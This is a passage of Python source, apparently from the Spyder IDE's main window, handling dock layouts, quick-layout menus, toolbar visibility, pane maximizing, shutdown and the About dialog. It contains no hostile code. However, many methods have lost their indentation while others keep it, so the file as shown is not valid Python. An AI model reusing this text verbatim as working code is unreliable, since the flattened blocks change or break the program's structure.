        self.current_quick_layout = 'default'
        # Regenerate menu
        self.quick_layout_set_menu()
    self.set_window_settings(*settings)
    # Let every registered plugin adjust itself to the restored layout.
    for plugin in self.widgetlist:
        try:
            plugin.initialize_plugin_in_mainwindow_layout()
        except Exception as error:
            print("%s: %s" % (plugin, str(error)), file=STDERR)
            traceback.print_exc(file=STDERR)
    def setup_default_layouts(self, index, settings):
        """Setup default layouts when run for the first time.

        *index* selects the layout: the string 'default' or one of the
        MATLAB/RSTUDIO/VERTICAL/HORIZONTAL constants defined below.
        *settings* is the tuple returned by ``load_window_settings``.
        """
        self.set_window_settings(*settings)
        # Disable repaints while docks are rearranged; re-enabled in
        # layout_fix_timer()
        self.setUpdatesEnabled(False)
        # IMPORTANT: order has to be the same as defined in the config file
        MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
        # define widgets locally
        editor = self.editor
        console_ipy = self.ipyconsole
        console_int = self.console
        outline = self.outlineexplorer
        explorer_project = self.projects
        explorer_file = self.explorer
        explorer_variable = self.variableexplorer
        history = self.historylog
        finder = self.findinfiles
        help_plugin = self.help
        helper = self.onlinehelp
        plugins = self.thirdparty_plugins
        # Widgets/toolbars hidden in every layout, on top of each layout's
        # own 'hidden widgets'/'hidden toolbars' lists
        global_hidden_widgets = [finder, console_int, explorer_project,
                                 helper] + plugins
        global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
                                  self.search_toolbar]
        # Layout definition
        # layouts are organized by columns, each column is organized by rows
        # widths have to add 1.0, height per column have to add 1.0
        # Spyder Default Initial Layout
        s_layout = {'widgets': [
            # column 0
            [[explorer_project]],
            # column 1
            [[editor]],
            # column 2
            [[outline]],
            # column 3
            [[help_plugin, explorer_variable, helper, explorer_file,
              finder] + plugins,
             [console_int, console_ipy, history]]
            ],
            'width fraction': [0.0,             # column 0 width
                               0.55,            # column 1 width
                               0.0,             # column 2 width
                               0.45],           # column 3 width
            'height fraction': [[1.0],          # column 0, row heights
                                [1.0],          # column 1, row heights
                                [1.0],          # column 2, row heights
                                [0.46, 0.54]],  # column 3, row heights
            'hidden widgets': [outline],
            'hidden toolbars': [],
            }
        r_layout = {'widgets': [
            # column 0
            [[editor],
             [console_ipy, console_int]],
            # column 1
            [[explorer_variable, history, outline, finder] + plugins,
             [explorer_file, explorer_project, help_plugin, helper]]
            ],
            'width fraction': [0.55,            # column 0 width
                               0.45],           # column 1 width
            'height fraction': [[0.55, 0.45],   # column 0, row heights
                                [0.55, 0.45]],  # column 1, row heights
            'hidden widgets': [outline],
            'hidden toolbars': [],
            }
        # Matlab
        m_layout = {'widgets': [
            # column 0
            [[explorer_file, explorer_project],
             [outline]],
            # column 1
            [[editor],
             [console_ipy, console_int]],
            # column 2
            [[explorer_variable, finder] + plugins,
             [history, help_plugin, helper]]
            ],
            'width fraction': [0.20,            # column 0 width
                               0.40,            # column 1 width
                               0.40],           # column 2 width
            'height fraction': [[0.55, 0.45],   # column 0, row heights
                                [0.55, 0.45],   # column 1, row heights
                                [0.55, 0.45]],  # column 2, row heights
            'hidden widgets': [],
            'hidden toolbars': [],
            }
        # Vertically split
        v_layout = {'widgets': [
            # column 0
            [[editor],
             [console_ipy, console_int, explorer_file,
              explorer_project, help_plugin, explorer_variable,
              history, outline, finder, helper] + plugins]
            ],
            'width fraction': [1.0],            # column 0 width
            'height fraction': [[0.55, 0.45]],  # column 0, row heights
            'hidden widgets': [outline],
            'hidden toolbars': [],
            }
        # Horizontally split
        h_layout = {'widgets': [
            # column 0
            [[editor]],
            # column 1
            [[console_ipy, console_int, explorer_file,
              explorer_project, help_plugin, explorer_variable,
              history, outline, finder, helper] + plugins]
            ],
            'width fraction': [0.55,            # column 0 width
                               0.45],           # column 1 width
            'height fraction': [[1.0],          # column 0, row heights
                                [1.0]],         # column 1, row heights
            'hidden widgets': [outline],
            'hidden toolbars': []
            }
        # Layout selection
        # NOTE: keys deliberately mix the string 'default' with the int
        # constants defined above — `index` can be either
        layouts = {'default': s_layout,
                   RSTUDIO: r_layout,
                   MATLAB: m_layout,
                   VERTICAL: v_layout,
                   HORIZONTAL: h_layout}
        layout = layouts[index]
        widgets_layout = layout['widgets']
        # Flatten the column/row structure into a single widget list
        widgets = []
        for column in widgets_layout :
            for row in column:
                for widget in row:
                    if widget is not None:
                        widgets.append(widget)
        # Make every widget visible
        for widget in widgets:
            widget.toggle_view(True)
            action = widget.toggle_view_action
            action.setChecked(widget.dockwidget.isVisible())
        # Set the widgets horizontally
        for i in range(len(widgets) - 1):
            first, second = widgets[i], widgets[i+1]
            if first is not None and second is not None:
                self.splitDockWidget(first.dockwidget, second.dockwidget,
                                     Qt.Horizontal)
        # Arrange rows vertically
        for column in widgets_layout :
            for i in range(len(column) - 1):
                first_row, second_row = column[i], column[i+1]
                if first_row is not None and second_row is not None:
                    self.splitDockWidget(first_row[0].dockwidget,
                                         second_row[0].dockwidget,
                                         Qt.Vertical)
        # Tabify
        for column in widgets_layout :
            for row in column:
                for i in range(len(row) - 1):
                    first, second = row[i], row[i+1]
                    if first is not None and second is not None:
                        self.tabify_plugins(first, second)
                # Raise front widget per row
                row[0].dockwidget.show()
                row[0].dockwidget.raise_()
        # Hide toolbars
        hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
        for toolbar in hidden_toolbars:
            if toolbar is not None:
                toolbar.close()
        # Hide widgets
        hidden_widgets = global_hidden_widgets + layout['hidden widgets']
        for widget in hidden_widgets:
            if widget is not None:
                widget.dockwidget.close()
        # set the width and height
        self._layout_widget_info = []
        width, height = self.window_size.width(), self.window_size.height()
        # fix column width
#        for c in range(len(widgets_layout)):
#            widget = widgets_layout[c][0][0].dockwidget
#            min_width, max_width = widget.minimumWidth(), widget.maximumWidth()
#            info = {'widget': widget,
#                    'min width': min_width,
#                    'max width': max_width}
#            self._layout_widget_info.append(info)
#            new_width = int(layout['width fraction'][c] * width * 0.95)
#            widget.setMinimumWidth(new_width)
#            widget.setMaximumWidth(new_width)
#            widget.updateGeometry()
        # fix column height
        for c, column in enumerate(widgets_layout):
            for r in range(len(column) - 1):
                widget = column[r][0]
                dockwidget = widget.dockwidget
                dock_min_h = dockwidget.minimumHeight()
                dock_max_h = dockwidget.maximumHeight()
                # Remember the original constraints so layout_fix_timer()
                # can restore them after the forced resize settles
                info = {'widget': widget,
                        'dock min height': dock_min_h,
                        'dock max height': dock_max_h}
                self._layout_widget_info.append(info)
                # The 0.95 factor is to adjust height based on usefull
                # estimated area in the window
                new_height = int(layout['height fraction'][c][r]*height*0.95)
                dockwidget.setMinimumHeight(new_height)
                dockwidget.setMaximumHeight(new_height)
        # Undo the temporary min/max constraints once Qt has applied the
        # layout (single-shot timer -> layout_fix_timer)
        self._custom_layout_timer = QTimer(self)
        self._custom_layout_timer.timeout.connect(self.layout_fix_timer)
        self._custom_layout_timer.setSingleShot(True)
        self._custom_layout_timer.start(5000)
    def layout_fix_timer(self):
        """Fixes the height of docks after a new layout is set.

        Restores the min/max width/height constraints recorded in
        ``self._layout_widget_info`` by ``setup_default_layouts`` and
        re-enables window repaints.
        """
        info = self._layout_widget_info
        for i in info:
            dockwidget = i['widget'].dockwidget
            # Width entries are only present if the (currently commented
            # out) column-width fixing code recorded them
            if 'dock min width' in i:
                dockwidget.setMinimumWidth(i['dock min width'])
                dockwidget.setMaximumWidth(i['dock max width'])
            if 'dock min height' in i:
                dockwidget.setMinimumHeight(i['dock min height'])
                dockwidget.setMaximumHeight(i['dock max height'])
            dockwidget.updateGeometry()
        # Counterpart of the setUpdatesEnabled(False) in
        # setup_default_layouts
        self.setUpdatesEnabled(True)
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
    def quick_layout_set_menu(self):
        """Rebuild the quick-layouts menu from the current settings."""
        get = CONF.get
        names = get('quick_layouts', 'names')
        order = get('quick_layouts', 'order')
        active = get('quick_layouts', 'active')
        ql_actions = []
        ql_actions = [create_action(self, _('Spyder Default Layout'),
                                    triggered=lambda:
                                    self.quick_layout_switch('default'))]
        for name in order:
            if name in active:
                index = names.index(name)
                # closure required so lambda works with the default parameter
                def trigger(i=index, self=self):
                    return lambda: self.quick_layout_switch(i)
                qli_act = create_action(self, name, triggered=trigger())
                # closure above replaces the following which stopped working
                # qli_act = create_action(self, name, triggered=lambda i=index:
                #     self.quick_layout_switch(i)
                ql_actions += [qli_act]
        self.ql_save = create_action(self, _("Save current layout"),
                                     triggered=lambda:
                                     self.quick_layout_save(),
                                     context=Qt.ApplicationShortcut)
        self.ql_preferences = create_action(self, _("Layout preferences"),
                                            triggered=lambda:
                                            self.quick_layout_settings(),
                                            context=Qt.ApplicationShortcut)
        self.ql_reset = create_action(self, _('Reset to spyder default'),
                                      triggered=self.reset_window_layout)
        self.register_shortcut(self.ql_save, "_", "Save current layout")
        self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
        # None acts as a separator in add_actions
        ql_actions += [None]
        ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
        self.quick_layout_menu.clear()
        add_actions(self.quick_layout_menu, ql_actions)
        # Disable the preferences entry when there is nothing to configure
        if len(order) == 0:
            self.ql_preferences.setEnabled(False)
        else:
            self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
get = CONF.get
set_ = CONF.set
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(self, _("Warning"),
_("Layout <b>%s</b> will be \
overwritten. Do you want to \
continue?") % name,
QMessageBox.Yes | QMessageBox.No)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make active a new layout even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
set_('quick_layouts', 'names', names)
set_('quick_layouts', 'order', order)
set_('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
    def quick_layout_switch(self, index):
        """Switch to quick layout number *index*.

        *index* is either the string 'default' or an integer slot number
        whose settings live in the 'quick_layouts' section.
        """
        section = 'quick_layouts'
        try:
            settings = self.load_window_settings('layout_{}/'.format(index),
                                                 section=section)
            (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
             is_fullscreen) = settings
            # The defaults layouts will always be regenerated unless there was
            # an overwrite, either by rewriting with same name, or by deleting
            # and then creating a new one
            if hexstate is None:
                # The value for hexstate shouldn't be None for a custom saved
                # layout (ie, where the index is greater than the number of
                # defaults). See issue 6202.
                if index != 'default' and index >= self.DEFAULT_LAYOUTS:
                    QMessageBox.critical(
                            self, _("Warning"),
                            _("Error opening the custom layout.  Please close"
                              " Spyder and try again.  If the issue occurs"
                              " again, then you must use 'Reset to Spyder "
                              "default' from the layout menu."))
                    return
                self.setup_default_layouts(index, settings)
        except cp.NoOptionError:
            # No settings were ever stored under this slot
            QMessageBox.critical(self, _("Warning"),
                                 _("Quick switch layout #%s has not yet "
                                   "been defined.") % str(index))
            return
            # TODO: is there any real use in calling the previous layout
            # setting?
            # self.previous_layout_settings = self.get_window_settings()
        self.set_window_settings(*settings)
        self.current_quick_layout = index
        # make sure the flags are correctly set for visible panes
        for plugin in self.widgetlist:
            action = plugin.toggle_view_action
            action.setChecked(plugin.dockwidget.isVisible())
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
    def valid_project(self):
        """Handle an invalid active project.

        If the currently active project path is no longer a valid Spyder
        project, warn the user and close it.
        """
        try:
            path = self.projects.get_active_project_path()
        except AttributeError:
            # Projects plugin not available/initialized yet
            return
        if bool(path):
            if not self.projects.is_valid_project(path):
                # NOTE(review): this inner `if path:` is redundant — `path`
                # is already known truthy from the outer check
                if path:
                    QMessageBox.critical(
                        self,
                        _('Error'),
                        _("<b>{}</b> is no longer a valid Spyder project! "
                          "Since it is the current active project, it will "
                          "be closed automatically.").format(path))
                self.projects.close_project()
    def free_memory(self):
        """Free memory after event."""
        # Force a full garbage-collection pass to release objects dropped
        # by the event that just finished
        gc.collect()
    def plugin_focus_changed(self):
        """Focus has changed from one plugin to another.

        Refresh the Edit and Search menus so their actions reflect the
        newly focused widget.
        """
        self.update_edit_menu()
        self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(element._shown_shortcut)
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(QKeySequence())
    def get_focus_widget_properties(self):
        """Get properties of focus widget
        Returns tuple (widget, properties) where properties is a tuple of
        booleans: (is_console, not_readonly, readwrite_editor)"""
        widget = QApplication.focusWidget()
        # Local imports to avoid import cycles at module load time
        from spyder.widgets.shell import ShellBaseWidget
        from spyder.widgets.editor import TextEditBaseWidget
        from spyder.widgets.ipythonconsole import ControlWidget
        # if focused widget isn't valid try the last focused
        if not isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
                                   ControlWidget)):
            widget = self.previous_focused_widget
        # properties stay None when neither the current nor the previous
        # focus widget is a console/editor
        textedit_properties = None
        if isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
                               ControlWidget)):
            console = isinstance(widget, (ShellBaseWidget, ControlWidget))
            not_readonly = not widget.isReadOnly()
            readwrite_editor = not_readonly and not console
            textedit_properties = (console, not_readonly, readwrite_editor)
        return widget, textedit_properties
    def update_edit_menu(self):
        """Update edit menu.

        Enable/disable the Edit actions according to the widget that
        currently has focus (console vs. editor, read-only or not).
        """
        widget, textedit_properties = self.get_focus_widget_properties()
        if textedit_properties is None: # widget is not an editor/console
            return
        #!!! Below this line, widget is expected to be a QPlainTextEdit instance
        console, not_readonly, readwrite_editor = textedit_properties
        # Editor has focus and there is no file opened in it
        if not console and not_readonly and not self.editor.is_file_opened():
            return
        # Disabling all actions to begin with
        for child in self.edit_menu.actions():
            child.setEnabled(False)
        self.selectall_action.setEnabled(True)
        # Undo, redo
        self.undo_action.setEnabled( readwrite_editor \
                                     and widget.document().isUndoAvailable() )
        self.redo_action.setEnabled( readwrite_editor \
                                     and widget.document().isRedoAvailable() )
        # Copy, cut, paste, delete
        has_selection = widget.has_selected_text()
        self.copy_action.setEnabled(has_selection)
        # Cut/paste additionally require the widget to be writable
        self.cut_action.setEnabled(has_selection and not_readonly)
        self.paste_action.setEnabled(not_readonly)
        # Comment, uncomment, indent, unindent...
        if not console and not_readonly:
            # This is the editor and current file is writable
            for action in self.editor.edit_menu_actions:
                action.setEnabled(True)
    def update_search_menu(self):
        """Update search menu.

        Enable the Search actions that apply to the focused widget and
        disable Replace for read-only widgets.
        """
        if self.menuBar().hasFocus():
            return
        widget, textedit_properties = self.get_focus_widget_properties()
        for action in self.editor.search_menu_actions:
            try:
                # Search-in-editor actions only apply if focus is inside
                # the Editor plugin
                action.setEnabled(self.editor.isAncestorOf(widget))
            except RuntimeError:
                # The underlying C++ QAction may already be deleted
                pass
        if textedit_properties is None: # widget is not an editor/console
            return
        #!!! Below this line, widget is expected to be a QPlainTextEdit instance
        _x, _y, readwrite_editor = textedit_properties
        # Disable the replace action for read-only files
        self.search_menu_actions[3].setEnabled(readwrite_editor)
    def create_plugins_menu(self):
        """Populate the Panes menu with each plugin's toggle action.

        `order` starts as a template of CONF_SECTION names (None acts as
        a menu separator); matching names are replaced in place by the
        plugin's action so the menu keeps a fixed ordering, and unknown
        plugins are appended at the end.
        """
        order = ['editor', 'console', 'ipython_console', 'variable_explorer',
                 'help', None, 'explorer', 'outline_explorer',
                 'project_explorer', 'find_in_files', None, 'historylog',
                 'profiler', 'breakpoints', 'pylint', None,
                 'onlinehelp', 'internal_console']
        for plugin in self.widgetlist:
            action = plugin.toggle_view_action
            action.setChecked(plugin.dockwidget.isVisible())
            try:
                name = plugin.CONF_SECTION
                pos = order.index(name)
            except ValueError:
                pos = None
            if pos is not None:
                order[pos] = action
            else:
                order.append(action)
        # Drop template names that were never replaced by a loaded plugin
        actions = order[:]
        for action in order:
            if type(action) is str:
                actions.remove(action)
        self.plugins_menu_actions = actions
        add_actions(self.plugins_menu, actions)
    def create_toolbars_menu(self):
        """Populate the Toolbars menu with each toolbar's toggle action.

        Same in-place replacement scheme as create_plugins_menu: `order`
        is a template of objectName()s (None is a separator), replaced by
        the corresponding toggle actions.
        """
        order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
                 'main_toolbar', 'Global working directory', None,
                 'search_toolbar', 'edit_toolbar', 'source_toolbar']
        for toolbar in self.toolbarslist:
            action = toolbar.toggleViewAction()
            name = toolbar.objectName()
            try:
                pos = order.index(name)
            except ValueError:
                pos = None
            if pos is not None:
                order[pos] = action
            else:
                order.append(action)
        # NOTE(review): unlike create_plugins_menu, leftover name strings
        # are NOT filtered out here before add_actions — presumably
        # add_actions ignores non-action entries; verify
        add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
    def set_splash(self, message):
        """Set splash message.

        No-op when no splash screen exists (e.g. started with --no-splash).
        """
        if self.splash is None:
            return
        if message:
            self.debug_print(message)
        self.splash.show()
        self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter |
                                Qt.AlignAbsolute, QColor(Qt.white))
        # Let Qt repaint the splash immediately during startup
        QApplication.processEvents()
def remove_tmpdir(self):
"""Remove Spyder temporary directory"""
if CONF.get('main', 'single_instance') and not self.new_instance:
shutil.rmtree(programs.TEMPDIR, ignore_errors=True)
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
    def resizeEvent(self, event):
        """Reimplement Qt method"""
        # Only track the "normal" geometry — ignore maximized/fullscreen
        # sizes so they are not persisted as the restore size
        if not self.isMaximized() and not self.fullscreen_flag:
            self.window_size = self.size()
        QMainWindow.resizeEvent(self, event)
        # To be used by the tour to be able to resize
        self.sig_resized.emit(event)
    def moveEvent(self, event):
        """Reimplement Qt method"""
        # Only track the "normal" position — ignore maximized/fullscreen
        # positions so they are not persisted as the restore position
        if not self.isMaximized() and not self.fullscreen_flag:
            self.window_position = self.pos()
        QMainWindow.moveEvent(self, event)
        # To be used by the tour to be able to move
        self.sig_moved.emit(event)
    def hideEvent(self, event):
        """Reimplement Qt method"""
        try:
            # Notify the plugin that owns the last-focused widget so it
            # can refresh itself when the window is shown again
            for plugin in self.widgetlist:
                if plugin.isAncestorOf(self.last_focused_widget):
                    plugin.visibility_changed(True)
            QMainWindow.hideEvent(self, event)
        except RuntimeError:
            # The underlying C++ object of a widget may already be deleted
            QMainWindow.hideEvent(self, event)
    def change_last_focused_widget(self, old, now):
        """To keep track of to the last focused widget.

        Connected to the application's focus-changed notification:
        *old* is the widget losing focus, *now* the one gaining it.
        """
        if (now is None and QApplication.activeWindow() is not None):
            # Focus left every widget but the window is still active:
            # re-assert focus on the window and record the result
            QApplication.activeWindow().setFocus()
            self.last_focused_widget = QApplication.focusWidget()
        elif now is not None:
            self.last_focused_widget = now
        self.previous_focused_widget =  old
    def closing(self, cancelable=False):
        """Exit tasks.

        Run the shutdown sequence: optional confirmation prompt, saving
        window settings, and closing every plugin.  Returns True when
        closing may proceed, False when the user or a plugin vetoed it.
        """
        if self.already_closed or self.is_starting_up:
            return True
        if cancelable and CONF.get('main', 'prompt_on_exit'):
            reply = QMessageBox.critical(self, 'Spyder',
                                         'Do you really want to exit?',
                                         QMessageBox.Yes, QMessageBox.No)
            if reply == QMessageBox.No:
                return False
        prefix = 'window' + '/'
        self.save_current_window_settings(prefix)
        if CONF.get('main', 'single_instance') and self.open_files_server:
            self.open_files_server.close()
        # Any plugin may veto the shutdown by returning False
        for plugin in self.thirdparty_plugins:
            if not plugin.closing_plugin(cancelable):
                return False
        for widget in self.widgetlist:
            if not widget.closing_plugin(cancelable):
                return False
        self.dialog_manager.close_all()
        if self.toolbars_visible:
            self.save_visible_toolbars()
        self.already_closed = True
        return True
def add_dockwidget(self, child):
"""Add QDockWidget and toggleViewAction"""
dockwidget, location = child.create_dockwidget()
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(dockwidget.features()|
QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(child)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in self.widgetlist:
if plugin.isAncestorOf(widget):
plugin.dockwidget.hide()
break
    def toggle_lock_dockwidgets(self, value):
        """Lock/Unlock dockwidgets"""
        # Set the flag first: apply_panes_settings presumably reads
        # dockwidgets_locked — keep this ordering
        self.dockwidgets_locked = value
        self.apply_panes_settings()
        CONF.set('main', 'panes_locked', value)
    def __update_maximize_action(self):
        # Sync the maximize action's text/icon/tooltip with the current
        # state: state_before_maximizing is None while no pane is
        # maximized (see maximize_dockwidget)
        if self.state_before_maximizing is None:
            text = _("Maximize current pane")
            tip = _("Maximize current pane")
            icon = ima.icon('maximize')
        else:
            text = _("Restore current pane")
            tip = _("Restore pane to its original size")
            icon = ima.icon('unmaximize')
        self.maximize_action.setText(text)
        self.maximize_action.setIcon(icon)
        self.maximize_action.setToolTip(tip)
    @Slot()
    @Slot(bool)
    def maximize_dockwidget(self, restore=False):
        """Shortcut: Ctrl+Alt+Shift+M
        First call: maximize current dockwidget
        Second call (or restore=True): restore original window layout"""
        if self.state_before_maximizing is None:
            if restore:
                # Nothing is maximized, nothing to restore
                return
            # Select plugin to maximize
            self.state_before_maximizing = self.saveState()
            focus_widget = QApplication.focusWidget()
            # Hide every pane; remember the one holding the focus
            for plugin in self.widgetlist:
                plugin.dockwidget.hide()
                if plugin.isAncestorOf(focus_widget):
                    self.last_plugin = plugin
            # Only plugins that have a dockwidget are part of widgetlist,
            # so last_plugin can be None after the above "for" cycle.
            # For example, this happens if, after Spyder has started, focus
            # is set to the Working directory toolbar (which doesn't have
            # a dockwidget) and then you press the Maximize button
            if self.last_plugin is None:
                # Using the Editor as default plugin to maximize
                self.last_plugin = self.editor
            # Maximize last_plugin
            self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
            # Re-parenting the plugin as central widget takes it out of
            # its dockwidget
            self.setCentralWidget(self.last_plugin)
            self.last_plugin.ismaximized = True
            # Workaround to solve an issue with editor's outline explorer:
            # (otherwise the whole plugin is hidden and so is the outline explorer
            # and the latter won't be refreshed if not visible)
            self.last_plugin.show()
            self.last_plugin.visibility_changed(True)
            if self.last_plugin is self.editor:
                # Automatically show the outline if the editor was maximized:
                self.addDockWidget(Qt.RightDockWidgetArea,
                                   self.outlineexplorer.dockwidget)
                self.outlineexplorer.dockwidget.show()
        else:
            # Restore original layout (before maximizing current dockwidget)
            self.last_plugin.dockwidget.setWidget(self.last_plugin)
            self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
            self.setCentralWidget(None)
            self.last_plugin.ismaximized = False
            self.restoreState(self.state_before_maximizing)
            self.state_before_maximizing = None
            self.last_plugin.get_focus_widget().setFocus()
        self.__update_maximize_action()
    def __update_fullscreen_action(self):
        # Swap the action icon to reflect the current fullscreen state
        if self.isFullScreen():
            icon = ima.icon('window_nofullscreen')
        else:
            icon = ima.icon('window_fullscreen')
        # ima.icon may return an icon name string; resolve it to a QIcon
        if is_text_string(icon):
            icon = get_icon(icon)
        self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.isFullScreen():
self.fullscreen_flag = False
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
    @Slot()
    def about(self):
        """About Spyder"""
        versions = get_versions()
        # Show Mercurial revision for development version
        revlink = ''
        if versions['revision']:
            rev = versions['revision']
            revlink = " (<a href='https://github.com/spyder-ide/spyder/"\
                      "commit/%s'>Commit: %s</a>)" % (rev, rev)
        # NOTE: the rich-text body below is interpolated with %-formatting;
        # keep the placeholder count in sync with the tuple at the end
        QMessageBox.about(self,
            _("About %s") % "Spyder",
            """<b>Spyder %s</b> %s
            <br>The Scientific PYthon Development EnviRonment
            <br>Copyright &copy; The Spyder Project Contributors
            <br>Licensed under the terms of the MIT License
            <p>Created by Pierre Raybaut.
            <br>Developed and maintained by the
            <a href="%s/blob/master/AUTHORS">Spyder Project Contributors</a>.
            <br>Many thanks to all the Spyder beta testers and regular users.
            <p>For help with Spyder errors and crashes, please read our
            <a href="%s">Troubleshooting page</a>, and for bug reports and
            feature requests, visit our <a href="%s">Github website</a>.
            For project discussion, see our <a href="%s">Google Group</a>.
            <p>This project is part of a larger effort to promote and
            facilitate the use of Python for scientific and engineering
            software development. The popular Python distributions
            <a href="http://continuum.io/downloads">Anaconda</a>,
            <a href="https://winpython.github.io/">WinPython</a> and
            <a href="http://python-xy.github.io/">Python(x,y)</a>
            also contribute to this plan.
            <p>Python %s %dbits, Qt %s, %s %s on %s
            <p><small>Most of the icons for the Spyder 2 theme come from the Crystal
            Project (&copy; 2006-2007 Everaldo Coelho). Other icons for that
            theme come from <a href="http://p.yusukekamiyamane.com/"> Yusuke
            Kamiyamane</a> (all rights reserved) and from
            <a href="http://www.oxygen-icons.org/">
            The Oxygen icon theme</a></small>.
            """
            % (versions['spyder'], revlink, __project_url__, __trouble_url__,
               __project_url__, __forum_url__, versions['python'],
               versions['bitness'], versions['qt'], versions['qt_api'],
               versions['qt_api_ver'], versions['system']))
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(None)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.exec_()
    def render_issue(self, description='', traceback=''):
        """Render issue before sending it to Github.

        Returns a Markdown string combining *description*, an optional
        *traceback* section, version information and the dependency
        status report.
        """
        # Get component versions
        versions = get_versions()
        # Get git revision for development version
        revision = ''
        if versions['revision']:
            revision = versions['revision']
        # Make a description header in case no description is supplied
        if not description:
            description = "### What steps reproduce the problem?"
        # Make error section from traceback and add appropriate reminder header
        if traceback:
            error_section = ("### Traceback\n"
                             "```python-traceback\n"
                             "{}\n"
                             "```".format(traceback))
        else:
            error_section = ''
        # Template lines are intentionally unindented so the resulting
        # Markdown is not rendered as a code block on Github
        issue_template = """\
## Description

{description}

{error_section}

## Versions

* Spyder version: {spyder_version} {commit}
* Python version: {python_version}
* Qt version: {qt_version}
* {qt_api_name} version: {qt_api_version}
* Operating System: {os_name} {os_version}

### Dependencies

```
{dependencies}
```
""".format(description=description,
           error_section=error_section,
           spyder_version=versions['spyder'],
           commit=revision,
           python_version=versions['python'],
           qt_version=versions['qt'],
